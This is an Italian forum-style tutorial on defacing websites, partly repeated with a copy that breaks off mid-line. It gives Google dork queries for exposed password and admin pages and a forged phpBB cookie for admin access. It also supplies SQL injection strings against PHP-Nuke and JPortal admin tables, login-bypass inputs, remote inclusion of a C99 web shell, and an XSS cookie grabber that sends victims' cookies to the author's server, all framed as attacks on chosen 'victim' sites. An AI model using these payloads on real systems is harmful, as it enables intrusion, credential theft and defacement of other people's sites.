Ecco qui una nuova guida su come defacciare manualmente, senza programmi :
1° LEZIONE [ GENERALE/INTRODUTTIVA ]
Allora... prima di iniziare a defacciare bisogna imparare il significato di questo termine , defacciare un sito significa hackerarlo, bucarlo, mettere alla luce i suoi Bugs ( dall'inglese insetti ) x poi segnalarli ....
Questo procedimento necessita dell'utilizzo di varie tecniche ,sia difensive x proteggerci durante il deface, sia offensive x defacciare :
TECNICHE DIFENSIVE = le tecniche difensive servono x proteggere i nostri dati personali e quindi x impedire all'amministratore del sito di identificarci e rintracciarci , quando navighiamo in rete , quando ci logghiamo su un sito , quando scambiamo dati all'interno di un ambiente network , probabilmente il nostro IP viene loggato ovvero memorizzato e grazie alle tecniche difensive noi nascondiamo il nostro indiritto IP.
TECNICHE OFFENSIVE = le tecniche offensive invece servono x mettere alla luce bugs , questo si può fare in vari metodi ke spieghero + avanti ma x tenerci sul generale queste tecniche implicano spesso l'utilizzo di Exploits , Google Hacker etc ...
2° LEZIONE [ PROXARCI ]
In questa lezione vi spiegherò cm proxarvi ovvero cm mascherare il vostro indirizzo IP x quanto riguarda la porta 80 [HTTP] , io personalmente uso TOR e mi ci trovo bene (TOR è scaricabile nella zona download del mio sito ) . TOR necessita di una configurazione, dopo l'installazione bisogna andare (x quanto riguarda IE) in Opzioni internet -> Connessioni -> Impostazioni LAN -> selezionare "utilizza un server proxy ..." -> Avanzate -> in HTTP inserire prima localhost o 127.0.0.1 e nella porta 8118.
X verificare se il programma x mascherare il vostro IP funzioni si vada su un sito ke mostra il vostro IP (Es.
L'unico punto a sfavore nel proxarci è che la connessione sara molto piu lenta del normale , le immagini nei siti web nn le visualizzerà correttamente (nn sempre) e nn vi accedera ad MSN [ solo xk TOR e Privoxy cambiano l'ip x mantenervi anonimi e MSN si disconnette appena l'ip viene modificato ]
NOTATE BENE = NEL DEFACCIARE I SITI IL PROXARSI è FONDAMENTALE!!!
3° LEZIONE [ GOOGLE HACKER ]
In questa lezione parleremo di cm trovare siti web cn vulnerabilità utilizzando google, questo procedimento si chiama google hacking cioè la parte "oscura" di google....
Infatti inserendo alcune stringhe chiamate query potrete trovare password , database contenenti qualsiasi tipi di dati etc...
ECCO LE QUERY:
intitle: Trova le pagine contenenti nel proprio titolo la parola chiave specificata
Esempio: intitle:xhtml
allintitle: Restituisce le pagine che contengono nel titolo tutte le parole specificate
Esempio: allintitle:xhtml tutorials
inurl: Limita i risultati alle pagine contenenti una determinata parola nell'URL
Esempio: inurl:css
allinurl: Limita i risultati alle pagine contenenti tutte le parole specificate nel proprio URL
Esempio: allinurl:css design
intext: Restituisce le pagine che contengono nel testo la parola chiave specificata
Esempio: intext:blog
allintext: Limita i risultati alla pagine che contengono nel testo tutte le parole specificate
Esempio: allintext:eric meyer
link: Ricerca le pagine Web che contengono collegamenti al link specificato
Esempio: link:HTML.it
inanchor: Ricerca negli anchor dei link presenti nelle pagine
Esempio: inanchor:linux
site: Restringe la ricerca ad un sito o ad un dominio di livello superiore
Esempi: site:com o site:it o site:Red Hat | The World's Open Source Leader
cache: Trova una copia della pagina che Google ha indicizzato nella propria cache. Utile quando le pagine non sono più online
Esempio: cache:
filetype: o ext: Limita i risultati ad un documento avente una determinata estensione di file (.doc, .pdf, .rtf, .pl, .sh, .xls, eccetera). Esempio: filetypel
define: Fornisce la descrizione di un termine ed i link ad esso correlati
Esempio: define:worm
related: Cerca pagine simili o affini alla pagina specificata
Esempio: related:HTML.it
info: Si ottengono ulteriori informazioni e link su un URL specificato. Fondamentale per tale descrizione è l'uso accorto dei metatag
Esempio: info:World Wide Web Consortium (W3C)
(Nota bene: non devono esservi spazi fra i due punti e la parola chiave specificata. Google non è case-sensitive, quindi è indifferente rispettare le maiuscole e le minuscole.)
QUERY + COMUNI X TROVARE VULNERABILITA :
CODICE:
allinurl:admin.php site:.edu
filetype: .ps, .xls, .txt, .ppt, .asp, ...
"Index of /password"
"Index of /admin"
"Index of /root"
inurl:login\admin.asp
inurl:admin\login.asp
allintitle: "index of/admin"
intitle:"Index of" passwd passwd.bak
intitle:"Index of" default.asp
intitle:"Index of" htimage.exe
intitle:index.of passlist
intitle:"Index of" .bash_history
intitle:"Index of" .sh_history
intitle:"Index of" fpcount.exe
intitle:"Index of" default.asp\
intitle:"Index of" stats.html
"powered by openbsd" +"powered by apache"
"Powered by phpBB 2.0.0"
4° LEZIONE [ DEFACCIARE FORUM PHPBB ]
Allora inizamo a studiare una la prima tecnica è molto semplice e serve x defacciare i forum PHPBB
semplicemente cambiando il codice guest dell'admin nel file dei cookies
X defacciare forum PHPBB esiste anke un programma di nome PHPBB DEFACER ke defaccia forum cn versione inferiore alla 2.0.10 in cui vi è questo bug ( Programma scaricabile nella sezione download del mio sito ).
Allora innanzi tutto bisogna cercare forum vulnerabili come fare ? ricordate la lezione precedente riguardante google hacker bene ora ci serve
andate su google e scrivete Powered by phpbb 1.0.12
Ah 1 consiglio x esperienza personale i link cn + probabilita di deface sono ad esempio :
adesso andate nei vostri cookies e cercate il nome del forum che volete defacciare appena aperto dovrebbe esserci una stringa del tipo phpbb2mysql_data e affianco un codice ke può variare voi tagliate quel codice e ci inserite
CODICE:
a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid% 22%3A1222%227D
[ se ne codice guest trovate gia questa stringa vuol dire che il forum nn è vulnerabile e niente da fare ]
ora salvate e chiudete tutte le pagine internet aperte in modo tale da far aggiornare i cookies
dopo di che riaprite il forum e dovreste essere loggati cm admin)
A volte vi sono dei problemi ovvero l'amministratore del sito potrebbe inserire x motivi di sicurezza un'altro account admin senza poteri e quindi nn potrete fare nulla.
Penso che vi sarete chiesti , ma questo codice cm fa a farci loggare cm admin ? se nn ve lo siete chiesti vi rispondo lo stesso vedete dove c'è scritto autologinid bene la stringa successiva attiva la modalita autologin mentre la stringa successiva a userid (penso che lo abbiate intuito ) si tratta dell'id dell'account admin facile questa vero ? ora passiamo ad altro
5° LEZIONE [ DEFACCIARE SITI PHP-NUKE ]
Adesso spiegherò cm defacciare siti php-nuke tramite un attakko sql-inject
(l'sql-inject è l'inserimento di codice sql grazie al quale si ottengono dati come password etc )
in questo caso dopo l'inserimento della stringa sql il sito dovrebbe darci le password criptate in md5 degli admin del sito
mettiamo tutto in pratica
cerchiamo tramite google hacker siti potenzialmente vulnerabili cn varie stringhe es:
inurl:index.php?name=Search
inurl:index.php?action=Search
inurl:modules.php?name=Search
etc etc...
una volta trovato l'elenco dei siti aprendoli vi dovrebbe visualizzare il modulo di ricerca del sito ( l'admin potrebbe disattivare i moduli di un sito quindi se appena aprite la pagina viene fuori una scritta del tipo Modulo non attivo nn si puo sfruttare questo bug ) voi inserite questa stringa :
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
e clikkate su cerca, se l'attakko è andato a buon fine il sito vi dovrebbe restituire una pagina cn le password criptate in md5
ok...ma se nn ha funzionato ?
bene se nn ha funzionato vuol dire che il sito nn è vulnerabile ad attakki nel modulo search e quindi proviamo cn un'altro modulo vulnerabile cm il modulo top10
facciamo la stessa cosa di prima...
google hacker inserendo le strighe ad esempio:
inurl:modules.php?name=Top
inurl:index.php?name=Top
etc etc...
una volta trovato il sito della prossima vittima inserite affianco al link questa stringa:
CODICE:
&querylang=%20WHERE%201=2%20UNION%20ALL%20SELEC T%2 01,pwd,1,1%20FROM%20nuke_authors
quindi il link finale risulterà :
CODICE:
adesso se tutto ha funzionato correttamente nella pagina dei sondaggi dovremmo trovare le md5
ATTENZIONE:
A VOLTE DOPO INSERITA QUESTA STRINGA IL SITO RISPONDE CN SCRITTE DEL TIPO OPERAZIONE ILLEGALE , VERRANNO CONTATTATE LE AUTORITA E COSE DEL GENERE MA STATE TRANQUILLI NN è NIENTE DI GRAVE...ALMENO DI SOLITO...
Ma se anke questo metodo nn funzionasse ?
beh si puo sempre provare cn un altro metodo , meno "produttivo" di qll precedenti xk cn questo bug è possibile rubare i cookie dell'admin ma di solito appena vengono trovate queste vulnerabilita ci si limita a segnalare , questo attakko si chiama XSS Cross Site Scripting [spiegato meglio + avanti]
2 moduli di PHP-NUKE sono vulnerabili a questo attakko qll dei Downloads e qll dei Web_Links (se nn sono gia stati fixati)
Andando nelle pagine di questi 2 moduli si troverà una cosa in comune , entrambi hanno un text x la ricerca , inserendo all'interno di questo text un iframe è possibile effettuare un attakko XSS...adesso mi spiego meglio...
prima di tutto bisogna creare un file cn dentro una stringa simile a questa :
CODICE:
<script>alert("lordhalo");</script>
salvate il file cm un file immagine e caricatelo su uno spazio web
nel nostro esempio carikeremo il file XSS.gif (cn dentro lo script) sul mio spazio altervista ovvero
adesso nn ci resta che creare la stringa iframe che in questo caso sarà :
CODICE:
<iframe src=http://www.lordhalo.altervista.org/XSS.gif>
cioè l'iframe fa in modo di caricare nella pagina l'immagine cn dentro lo script e se il sito sara vulnerabile vi stamperà a schermo lo script eseguendolo e in questo caso verrà fuori una schermata cn scritto lordhalo (testo ovviamente modificabile)
tutto ciò che rigurda gli attakki XSS verra spiegato + avanti in un capitolo ,a loro, interamente dedicato.
L'SQL Inject è una tecnica hacker k attakka tutte le applicazioni web che si basano su un database SQL.
L'attakkante utilizza alcune query SQL inviate alla pagina del sito web vulnerabile x ottenere dati come password etc.
6° LEZIONE [ ASP INJECT ]---------
Ekkoci giunti fin qui...
Questa tecnica tra l'altro molto semplice serve x defacciare siti ASP
Come prima cosa bisogna trovare pagine di login dell'admin in siti ASP
quindi cm al solito alla ricerca !! questa volta utiliziamo le stringhe
CODICE:
inurl:login\admin.asp
inurl:admin\login.asp
inurl:admin\admin.asp
inurl:amministrazione\login.asp
etc etc
una volta trovata la pagine si inserisce:
CODICE:
user: admin [o qll che si vuole xk la stringa User è indifferente]
pass:' or '
oppure
pass:'or'
è la stessa cosa...
se il sito è vulnerabile dovreste essere loggati cm admin
Questa tecnica fa parte della classificazione
SQL Inject
7° [ LEZIONE SCANNERIZZARE/RACCOGLIERE INFO ]
Bene iniziamo prima di tutto dobbiamo trovare l'ip del server su cui è hostato il sito da defacciare
cm si fa ?
basta aprire il prompt di DOS (START->ESEGUI scrivete CMD)
e mettendo il caso che il sito da defacciare sia
ping pippoclub.it
oppure
ping
e lui vi restituira una pagina cn scritte simili a queste :
CODICE:
Esecuzione di Ping pippoclub.it [ 123.45.6.78] con 32 byte di dati :
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
N.B:
-logicamente 123.45.6.78 è un IP a caso ma dopo l'esecuzione del ping è quello l'IP che dovrete prendere
-le X sostituiscono dei numeri che possono variare e Xms sarebbe la durata del ping in millisecondi
adesso ottenuto l'ip che fare ?
beh semplice bisogna cercare maggiori info possibili sul sito eseguendo un WHOIS
Con il WHOIS è possibile prendere i dati riguardanti il dominio del sito visto che tutti i domini a pagamento sono registrati
eseguire un WHOIS è molto semplice basta cercare un sito che offra questa possibilita e inserirvi i dati che abbiamo in questo caso l'ip
e ora avrete ottenuto dei dati sul sito vittima alcuni utili alcuni meno in caso contrario provate a cambiare database
dopo questo passaggio (nn fondamentale) dobbiamo disperatamente ottenere altri dati riguardanti la sicurezza e le falle del sito cm fare ?
ci sono 2 modi
-scannerizzare il sito cn programmi che rilevano bug
-port scanner ( spero che sappiate tutti che cos'è e cm funge senno lasciate xdere!)
Cn il primo è possibile ottenere i bug del sito e sfruttarli ma in caso contrario ? cioè se il programma nn trovasse bug ? in tal caso bisogna passare alla seconda opzione
eseguiamo una scannerizzazione del sito e verifichiamo le porte aperte
adesso mettiamo il caso che il server del sito abbia queste porte aperte
21 - FTP
80 - HTTP
139 - NETBIOS SESSION
445 - Microsof Ds
in questo caso dobbiamo cercare un modo x sfruttarle e cm fare ? beh ci sono sempre i metodi tradizionali attakkare tramite netbios , ftp etc etc..
ma se questo nn funziona ? in questo caso utilizzeremo gli EXPLOITS !!
(spero che sappiate tutti che cosa sono gli exploits e ke abbiate delle nozioni fondamentali su di essi)
ma cm trovarli ? semplicissimo andate su siti cm
una volta trovati provate,provate e riprovate
8° LEZIONE [ RFI ]
In questo capitolo si parla di RFI !! (Remote File Inclusion)(Remote File Include)
quindi utilizzare l'inclusione di file sfruttando spesso variabili nn sicure...
La C99 è una shell fatta in php che una volta inserita in un sito web vi dara la possibilita di avere davanti un pannello FTP cn molte opzioni
innanzitutto
bisogna uppare la shell su un vostro sito rinominandola in: (dopo spieghero il xk)
CODICE:
shell.jpg
C99.txt
shelc99.gif
insomma cm volete tranne che .PHP
adesso dovete cercare siti vulnerabili e cm al solito google è un buon amico
Query di Es.
CODICE:
Inurl:index.php?Conf=
una volta trovata la lista di siti apritene uno e inserite dopo "Conf=" (la variabile) il link della shell
ipotizzando che il link della shell sia
Es.
Sitovittima.it
e cosi dovreste avere la pag cn la c99 davanti !!!
pikkola parentesi Conf è una variabile cm un'altra e index.php è la pagina principale nel sito , inserendo quel url si "carichera" la shell all'interno della pagina
se volete avere maggiori info sugli url andate su
L'estensione della shell nn dev'essere php xk noi
vogliamo che una volta inserito il link della shell
sia eseguita sul sito della vittima e nn interpretata
9° LEZIONE [ JPORTAL ]
In questo capitolo ci occuperemo dei siti in JPORTAL!
cerchiamo siti vulnerabili cn google
basta inserire
POWERED BY JPORTAL
apritene uno e inserite affianco al sito:
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Es.
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Nella X va inserito il numero dell'ID del utente di cui si vuole trovare la pass (in questo caso l'admin) che di solito è 1,2,3,4,5,6,7
Nn dubito della vostra intelligenza ma preferisco spericificare ankora meglio cn un'altro esempio finale)
Es.1
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Es.2
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Es.3
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
se il sito è vulnerabile dovrebbe uscire na pagina cn l'user e pass del'ID che abbiamo inserito nn hasate
Il resto è intuibile...no?(ihih)
Anke questo attakko fa parte della classificazione
SQL Inject
10° LEZIONE [ DEFACCIARE I GUESTBOOK ]
Questa vulnerabilita è molto simile a qll nelle piattaforme ASP
Cm al solito cercate pagine vulnerabili cn google
Query:
inurl:guestbook/admin/login.php
inurl:guestbook/admin.php
Poi usate un po di fantasia...
Alla schermata di login dell'admin del guestbook inserite questi dati:
CODICE:
USER: 'or 'jr7'='jr7' /*
PASSWORD: qualsiasi
In questo caso, al contrario dell SQL Inject sulle piattaforme ASP, la stringa nulla è qll della password
A questo punto se il sito sara' vulnerabile vi troverete di fronte il pannello di amministrazione del guestbook
11° LEZIONE [ ATTAKKO XSS ]
In questo capitolo ci occuperemo del bug XSS!
prima un po di teoria l'attakko XSS o CSS significa Cross Site Scripting , viene chiamato XSS xk ci si potrebbe confondere cn il CSS che sarebbe Cascading Style Sheets , che assolutamente nn centra nulla , l'attakko viene spesso effettuato a motori di ricerca , i quali (quelli kn il bug) una volta inserita la stringa da ricercare la stampano direttamente a pagina senza "filtrarla" ad Es.
se io volessi cercare CIAO BELLO in un motore di ricerca e nn trovassi niente la pagina risponderebbe
Non è stato trovato alcun risultato con la parola CIAO BELLO
e in questo caso sara possibile inserire al posto della stringa CIAO BELLO un javascript )
adesso ricapitoliamo )
Mettiamo il caso di aver trovato un sito potenzialmente vulnerabile e vorremmo approfittarne, cm fare? basta inserire nella stringa della ricerca un javascript
CODICE:
Es.
<script language=JavaScript> window.alert("LoRdHaLo"); </script>
in caso di presenza del bug una volta avviata la ricerca vi si aprira una finestra a stile alert cn scritto LoRdHaLo ( testo ovviamente modificabile)
cn la presenza di questo bug nn solo è possibile far aprire qll finestrina ma è possibile reindirizzare il visitatore della pagina su altri siti a nostro piacimento , magari siti che rubano cookies e/o loggano l'IP ecc
Adesso spieghero cm utilizzare una vulnerabilita di questo tipo eseguendo un Cookies Grabber
Inserire in un pagina PHP questo codice :
CODICE:
<?PHP
$cookie = $_GET['data'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'
');
fclose($fp);
?>
Ovvero questa pagina una volta aperta loggera i cookies e l'IP della vittima in un file di nome cookies.txt...
Adesso salviamo la pagina cn il nome di cookie.php e uppiamola sul nostro sito in questo caso
Dopo aver inserito lo script : <script language=JavaScript> window.alert("SIOUX83"); </script>
Il link della pagina dovrebbe essere simile a questo
CODICE:
http://www.sitovittima.com/ricerca.php?k...<script language=JavaScript> window.alert("LoRdHaLo"); </script>
ma cm redirezionare la vittima sulla pagina in modo da rubargli i cookie ?
beh semplice, innanzitutto dobbiamo creare il link da dare alla vittima sostituendo il javascript
CODICE:
<script language=JavaScript> window.alert("LoRdHaLo"); </script> cn questo
<script language="JavaScript"> window.location="http://www.sitomio.net/cookie.php?cooked="+document
1° LEZIONE [ GENERALE/INTRODUTTIVA ]
Allora... prima di iniziare a defacciare bisogna imparare il significato di questo termine , defacciare un sito significa hackerarlo, bucarlo, mettere alla luce i suoi Bugs ( dall'inglese insetti ) x poi segnalarli ....
Questo procedimento necessita dell'utilizzo di varie tecniche ,sia difensive x proteggerci durante il deface, sia offensive x defacciare :
TECNICHE DIFENSIVE = le tecniche difensive servono x proteggere i nostri dati personali e quindi x impedire all'amministratore del sito di identificarci e rintracciarci , quando navighiamo in rete , quando ci logghiamo su un sito , quando scambiamo dati all'interno di un ambiente network , probabilmente il nostro IP viene loggato ovvero memorizzato e grazie alle tecniche difensive noi nascondiamo il nostro indiritto IP.
TECNICHE OFFENSIVE = le tecniche offensive invece servono x mettere alla luce bugs , questo si può fare in vari metodi ke spieghero + avanti ma x tenerci sul generale queste tecniche implicano spesso l'utilizzo di Exploits , Google Hacker etc ...
2° LEZIONE [ PROXARCI ]
In questa lezione vi spiegherò cm proxarvi ovvero cm mascherare il vostro indirizzo IP x quanto riguarda la porta 80 [HTTP] , io personalmente uso TOR e mi ci trovo bene (TOR è scaricabile nella zona download del mio sito ) . TOR necessita di una configurazione, dopo l'installazione bisogna andare (x quanto riguarda IE) in Opzioni internet -> Connessioni -> Impostazioni LAN -> selezionare "utilizza un server proxy ..." -> Avanzate -> in HTTP inserire prima localhost o 127.0.0.1 e nella porta 8118.
X verificare se il programma x mascherare il vostro IP funzioni si vada su un sito ke mostra il vostro IP (Es.
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
) prima e dopo l'apertura del programma se l'indirizzo è cambiato vuol dire ke il programma funge, in caso contrario verificate la configurazione. [Sempre x quanto riguarda TOR ogni volta ke ci si vuole proxare bisogno ri selezionare nelle impostazioni lan "utilizza un server proxy..." e dopo di ke bisogna attivare prima TOR e poi Privoxy, se si lascia l'opzione selezionata e TOR disattivato internet nn fungerà è un po nosioso lo so ]L'unico punto a sfavore nel proxarci è che la connessione sara molto piu lenta del normale , le immagini nei siti web nn le visualizzerà correttamente (nn sempre) e nn vi accedera ad MSN [ solo xk TOR e Privoxy cambiano l'ip x mantenervi anonimi e MSN si disconnette appena l'ip viene modificato ]
NOTATE BENE = NEL DEFACCIARE I SITI IL PROXARSI è FONDAMENTALE!!!
3° LEZIONE [ GOOGLE HACKER ]
In questa lezione parleremo di cm trovare siti web cn vulnerabilità utilizzando google, questo procedimento si chiama google hacking cioè la parte "oscura" di google....
Infatti inserendo alcune stringhe chiamate query potrete trovare password , database contenenti qualsiasi tipi di dati etc...
ECCO LE QUERY:
intitle: Trova le pagine contenenti nel proprio titolo la parola chiave specificata
Esempio: intitle:xhtml
allintitle: Restituisce le pagine che contengono nel titolo tutte le parole specificate
Esempio: allintitle:xhtml tutorials
inurl: Limita i risultati alle pagine contenenti una determinata parola nell'URL
Esempio: inurl:css
allinurl: Limita i risultati alle pagine contenenti tutte le parole specificate nel proprio URL
Esempio: allinurl:css design
intext: Restituisce le pagine che contengono nel testo la parola chiave specificata
Esempio: intext:blog
allintext: Limita i risultati alla pagine che contengono nel testo tutte le parole specificate
Esempio: allintext:eric meyer
link: Ricerca le pagine Web che contengono collegamenti al link specificato
Esempio: link:HTML.it
inanchor: Ricerca negli anchor dei link presenti nelle pagine
Esempio: inanchor:linux
site: Restringe la ricerca ad un sito o ad un dominio di livello superiore
Esempi: site:com o site:it o site:Red Hat | The World's Open Source Leader
cache: Trova una copia della pagina che Google ha indicizzato nella propria cache. Utile quando le pagine non sono più online
Esempio: cache:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
filetype: o ext: Limita i risultati ad un documento avente una determinata estensione di file (.doc, .pdf, .rtf, .pl, .sh, .xls, eccetera). Esempio: filetypel
define: Fornisce la descrizione di un termine ed i link ad esso correlati
Esempio: define:worm
related: Cerca pagine simili o affini alla pagina specificata
Esempio: related:HTML.it
info: Si ottengono ulteriori informazioni e link su un URL specificato. Fondamentale per tale descrizione è l'uso accorto dei metatag
Esempio: info:World Wide Web Consortium (W3C)
(Nota bene: non devono esservi spazi fra i due punti e la parola chiave specificata. Google non è case-sensitive, quindi è indifferente rispettare le maiuscole e le minuscole.)
QUERY + COMUNI X TROVARE VULNERABILITA :
CODICE:
allinurl:admin.php site:.edu
filetype: .ps, .xls, .txt, .ppt, .asp, ...
"Index of /password"
"Index of /admin"
"Index of /root"
inurl:login\admin.asp
inurl:admin\login.asp
allintitle: "index of/admin"
intitle:"Index of" passwd passwd.bak
intitle:"Index of" default.asp
intitle:"Index of" htimage.exe
intitle:index.of passlist
intitle:"Index of" .bash_history
intitle:"Index of" .sh_history
intitle:"Index of" fpcount.exe
intitle:"Index of" default.asp\
intitle:"Index of" stats.html
"powered by openbsd" +"powered by apache"
"Powered by phpBB 2.0.0"
4° LEZIONE [ DEFACCIARE FORUM PHPBB ]
Allora inizamo a studiare una la prima tecnica è molto semplice e serve x defacciare i forum PHPBB
semplicemente cambiando il codice guest dell'admin nel file dei cookies
X defacciare forum PHPBB esiste anke un programma di nome PHPBB DEFACER ke defaccia forum cn versione inferiore alla 2.0.10 in cui vi è questo bug ( Programma scaricabile nella sezione download del mio sito ).
Allora innanzi tutto bisogna cercare forum vulnerabili come fare ? ricordate la lezione precedente riguardante google hacker bene ora ci serve
andate su google e scrivete Powered by phpbb 1.0.12
Ah 1 consiglio x esperienza personale i link cn + probabilita di deface sono ad esempio :
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
e Perfavore,
Entra
oppure
Registrati
per vedere i Link!
quando li trovate cosi togliete tutto cio che c'è dopo il ? e tornate alla indexadesso andate nei vostri cookies e cercate il nome del forum che volete defacciare appena aperto dovrebbe esserci una stringa del tipo phpbb2mysql_data e affianco un codice ke può variare voi tagliate quel codice e ci inserite
CODICE:
a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid% 22%3A1222%227D
[ se ne codice guest trovate gia questa stringa vuol dire che il forum nn è vulnerabile e niente da fare ]
ora salvate e chiudete tutte le pagine internet aperte in modo tale da far aggiornare i cookies
dopo di che riaprite il forum e dovreste essere loggati cm admin)
A volte vi sono dei problemi ovvero l'amministratore del sito potrebbe inserire x motivi di sicurezza un'altro account admin senza poteri e quindi nn potrete fare nulla.
Penso che vi sarete chiesti , ma questo codice cm fa a farci loggare cm admin ? se nn ve lo siete chiesti vi rispondo lo stesso vedete dove c'è scritto autologinid bene la stringa successiva attiva la modalita autologin mentre la stringa successiva a userid (penso che lo abbiate intuito ) si tratta dell'id dell'account admin facile questa vero ? ora passiamo ad altro
5° LEZIONE [ DEFACCIARE SITI PHP-NUKE ]
Adesso spiegherò cm defacciare siti php-nuke tramite un attakko sql-inject
(l'sql-inject è l'inserimento di codice sql grazie al quale si ottengono dati come password etc )
in questo caso dopo l'inserimento della stringa sql il sito dovrebbe darci le password criptate in md5 degli admin del sito
mettiamo tutto in pratica
cerchiamo tramite google hacker siti potenzialmente vulnerabili cn varie stringhe es:
inurl:index.php?name=Search
inurl:index.php?action=Search
inurl:modules.php?name=Search
etc etc...
una volta trovato l'elenco dei siti aprendoli vi dovrebbe visualizzare il modulo di ricerca del sito ( l'admin potrebbe disattivare i moduli di un sito quindi se appena aprite la pagina viene fuori una scritta del tipo Modulo non attivo nn si puo sfruttare questo bug ) voi inserite questa stringa :
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
e clikkate su cerca, se l'attakko è andato a buon fine il sito vi dovrebbe restituire una pagina cn le password criptate in md5
ok...ma se nn ha funzionato ?
bene se nn ha funzionato vuol dire che il sito nn è vulnerabile ad attakki nel modulo search e quindi proviamo cn un'altro modulo vulnerabile cm il modulo top10
facciamo la stessa cosa di prima...
google hacker inserendo le strighe ad esempio:
inurl:modules.php?name=Top
inurl:index.php?name=Top
etc etc...
una volta trovato il sito della prossima vittima inserite affianco al link questa stringa:
CODICE:
&querylang=%20WHERE%201=2%20UNION%20ALL%20SELEC T%2 01,pwd,1,1%20FROM%20nuke_authors
quindi il link finale risulterà :
CODICE:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
adesso se tutto ha funzionato correttamente nella pagina dei sondaggi dovremmo trovare le md5
ATTENZIONE:
A VOLTE DOPO INSERITA QUESTA STRINGA IL SITO RISPONDE CN SCRITTE DEL TIPO OPERAZIONE ILLEGALE , VERRANNO CONTATTATE LE AUTORITA E COSE DEL GENERE MA STATE TRANQUILLI NN è NIENTE DI GRAVE...ALMENO DI SOLITO...
Ma se anke questo metodo nn funzionasse ?
beh si puo sempre provare cn un altro metodo , meno "produttivo" di qll precedenti xk cn questo bug è possibile rubare i cookie dell'admin ma di solito appena vengono trovate queste vulnerabilita ci si limita a segnalare , questo attakko si chiama XSS Cross Site Scripting [spiegato meglio + avanti]
2 moduli di PHP-NUKE sono vulnerabili a questo attakko qll dei Downloads e qll dei Web_Links (se nn sono gia stati fixati)
Andando nelle pagine di questi 2 moduli si troverà una cosa in comune , entrambi hanno un text x la ricerca , inserendo all'interno di questo text un iframe è possibile effettuare un attakko XSS...adesso mi spiego meglio...
prima di tutto bisogna creare un file cn dentro una stringa simile a questa :
CODICE:
<script>alert("lordhalo");</script>
salvate il file cm un file immagine e caricatelo su uno spazio web
nel nostro esempio carikeremo il file XSS.gif (cn dentro lo script) sul mio spazio altervista ovvero
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
adesso nn ci resta che creare la stringa iframe che in questo caso sarà :
CODICE:
<iframe src=http://www.lordhalo.altervista.org/XSS.gif>
cioè l'iframe fa in modo di caricare nella pagina l'immagine cn dentro lo script e se il sito sara vulnerabile vi stamperà a schermo lo script eseguendolo e in questo caso verrà fuori una schermata cn scritto lordhalo (testo ovviamente modificabile)
tutto ciò che rigurda gli attakki XSS verra spiegato + avanti in un capitolo ,a loro, interamente dedicato.
L'SQL Inject è una tecnica hacker k attakka tutte le applicazioni web che si basano su un database SQL.
L'attakkante utilizza alcune query SQL inviate alla pagina del sito web vulnerabile x ottenere dati come password etc.
6° LEZIONE [ ASP INJECT ]---------
Ekkoci giunti fin qui...
Questa tecnica tra l'altro molto semplice serve x defacciare siti ASP
Come prima cosa bisogna trovare pagine di login dell'admin in siti ASP
quindi cm al solito alla ricerca !! questa volta utiliziamo le stringhe
CODICE:
inurl:login\admin.asp
inurl:admin\login.asp
inurl:admin\admin.asp
inurl:amministrazione\login.asp
etc etc
una volta trovata la pagine si inserisce:
CODICE:
user: admin [o qll che si vuole xk la stringa User è indifferente]
pass:' or '
oppure
pass:'or'
è la stessa cosa...
se il sito è vulnerabile dovreste essere loggati cm admin
Questa tecnica fa parte della classificazione
SQL Inject
7° [ LEZIONE SCANNERIZZARE/RACCOGLIERE INFO ]
Bene iniziamo prima di tutto dobbiamo trovare l'ip del server su cui è hostato il sito da defacciare
cm si fa ?
basta aprire il prompt di DOS (START->ESEGUI scrivete CMD)
e mettendo il caso che il sito da defacciare sia
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
nel prompt dovete digitare:ping pippoclub.it
oppure
ping
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
e lui vi restituira una pagina cn scritte simili a queste :
CODICE:
Esecuzione di Ping pippoclub.it [ 123.45.6.78] con 32 byte di dati :
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
N.B:
-logicamente 123.45.6.78 è un IP a caso ma dopo l'esecuzione del ping è quello l'IP che dovrete prendere
-le X sostituiscono dei numeri che possono variare e Xms sarebbe la durata del ping in millisecondi
adesso ottenuto l'ip che fare ?
beh semplice bisogna cercare maggiori info possibili sul sito eseguendo un WHOIS
Con il WHOIS è possibile prendere i dati riguardanti il dominio del sito visto che tutti i domini a pagamento sono registrati
eseguire un WHOIS è molto semplice basta cercare un sito che offra questa possibilita e inserirvi i dati che abbiamo in questo caso l'ip
e ora avrete ottenuto dei dati sul sito vittima alcuni utili alcuni meno in caso contrario provate a cambiare database
dopo questo passaggio (nn fondamentale) dobbiamo disperatamente ottenere altri dati riguardanti la sicurezza e le falle del sito cm fare ?
ci sono 2 modi
-scannerizzare il sito cn programmi che rilevano bug
-port scanner ( spero che sappiate tutti che cos'è e cm funge senno lasciate xdere!)
